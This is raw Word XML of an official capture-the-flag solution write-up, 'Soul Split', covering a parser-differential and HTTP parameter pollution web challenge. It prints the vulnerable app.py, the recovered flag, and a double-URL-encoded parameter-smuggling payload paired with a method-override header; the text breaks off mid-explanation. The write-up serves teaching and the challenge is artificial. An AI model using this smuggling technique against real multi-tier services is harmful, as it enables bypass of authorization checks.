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D4ED8"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>BYTE ME CTF  •  OFFICIAL SOLUTION WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Soul Split — The Third Guardian (Web, Expert)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1E3A8A"/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6768"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="1E3A8A"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="1E3A8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592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Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768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Pratik Jadhav</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF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Web / Parser Differential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592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3A8A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8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F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Expert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="12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Challenge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36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3A8A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CHALLENGE BRIEFING &amp; LORE</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:i/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Every soul has three guardians. Each guardian believes it understands the same request. It doesn't. Investigate how multiple request-processing layers interpret the same transfer differently to awaken the Third Guardian.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Given:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A multi-layered web service with endpoints at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/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/soul/transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/soul/fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20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Target URL: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https://byteme-soul-split.onrender.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or local </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http://127.0.0.1:5000/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Flag Format:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP{...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FLAG{...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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Summary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Soul Split is an architecture-level web exploitation challenge centered around </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Parser Differentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP Parameter Pollution (HPP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> across multi-tier application architectures. A single HTTP POST request is evaluated by three independent layers: a Gateway Guardian, a Validator Guardian, and a Legacy Backend Application. The Gateway and Validator perform a single URL decode and inspect the first occurrence of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter (expecting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">), while requiring an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-HTTP-Method-Override: PATCH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> header. The Legacy Application decodes the body a second time and reads the final occurrence of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (expecting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>). By exploiting double URL encoding (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient%253Dadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), we hide an injected administrative parameter inside what appears to the front-line proxies as an inert parameter name, successfully triggering backend privilege elevation and releasing the flag.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Flag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val="single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="10B981"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="10B981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color w:val="059669"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FLAG RECOVERED</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:color w:val="059669"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>OWASP{s0ul_spl1t_th3_th1rd_guardian}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*(Local environment default: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FLAG{s0ul_spl1t_th3_th1rd_guardian}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="E2E8F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1 — Application Reconnaissance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Visiting the landing page (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) introduces the lore of the Three Guardians and the Soul Vault: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split_la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1: Soul Split Landing Page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Checking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/soul/history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> displays the historical record of soul transfers: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split_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2: Soul Transfer History Ledger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Attempting to access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/soul/fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly while unauthenticated renders the locked seal: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split_lock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3: Locked Fragment Interface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The application exposes the following endpoints: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GET /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Status page showing whether the Third Guardian is awakened.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GET /soul/history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Transfer ledger history.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GET /soul/verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Guardian validation status.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POST /soul/transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Main transfer gateway.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GET /soul/fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Protected vault storage containing the flag.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Attempting a standard transfer via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST /soul/transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=admin&amp;amount=100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> immediately yields HTTP 403 Forbidden with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rejected.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> page: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top w:val="none"/>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="1E3A8A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60" w:type="dxa"/>
            </w:tcMar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E3A8A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CHALLENGE BRIEFING &amp; LORE</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:i/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>*"The Guardians reject this transmission."*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split_reje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4: Transmission Rejected by Guardians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2 — Source Code Audit (`app.py`)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Inspecting the implementation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/soul/transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals how requests are processed through three distinct simulated layers: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@app.post('/soul/transfer')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transfer():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Guardian 1: Gateway checks raw body after exactly one URL decode.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raw = request.get_data(as_text=True)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once = unquote(raw)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first = parse_qs(once, keep_blank_values=True)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recipients = first.get('recipient', [])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recipient_seen = recipients[0] if recipients else ''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Guardian 2: Validator only accepts PATCH override and sees first recipient.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override = request.headers.get('X-HTTP-Method-Override', '').upper()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override != 'PATCH' or recipient_seen.lower() != 'guest':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return render_template('rejected.html'), 403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# Legacy application: Method override is honored; body decoded a second time.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override == 'PATCH':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twice = unquote(once)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final = parse_qs(twice, keep_blank_values=True)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final_recipients = final.get('recipient', [])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final_recipient = final_recipients[-1].lower() if final_recipients else ''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amount = final.get('amount', ['0'])[-1]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final_recipient == 'admin' and amount == '100':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session['awakened'] = True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session['guardian'] = 'third'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return redirect('/soul/fragment')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render_template('rejected.html'), 403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And </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/soul/fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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@app.get('/soul/fragment')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fragment():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not session.get('awakened'):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return render_template('locked.html'), 403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return render_template('fragment.html', flag=FLAG)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3 — Dissecting the Parser Differential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Let us analyze the conflicting requirements imposed across the layers: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Layer | Component | Decodes | Parameter Selection | Required Value | Additional Checks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|---|---|---|---|---|---|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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Layer 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Gateway Guardian | 1 time | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>first['recipient'][0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (First value) | Must exist | None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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Layer 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Validator Guardian | 0 (uses Layer 1) | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient_seen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Must be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'guest'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-HTTP-Method-Override: PATCH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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Layer 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Legacy Application | 2 times | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>final['recipient'][-1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Last value) | Must be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>amount == '100'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The Paradox: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To satisfy Guardian 2, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> recipient must be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>guest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To satisfy the Legacy Application, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>last</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> recipient must be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin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But if we simply send </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=guest&amp;recipient=admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, both layers would see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the second recipient, and many web application firewalls or validators would flag the duplicate parameter or reject the mismatched state.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Crucially, the Legacy Application performs a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>second URL decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unquote(once)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">), whereas Guardian 1 and 2 only decode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w: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Crafting the Injection via Double URL Encoding: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We want an assignment (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient=admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) to be completely invisible to Guardian 1/2's query string parser, but become an active parameter after the second decoding pass in Layer 3.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Consider the character </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937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Standard URL encoding of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
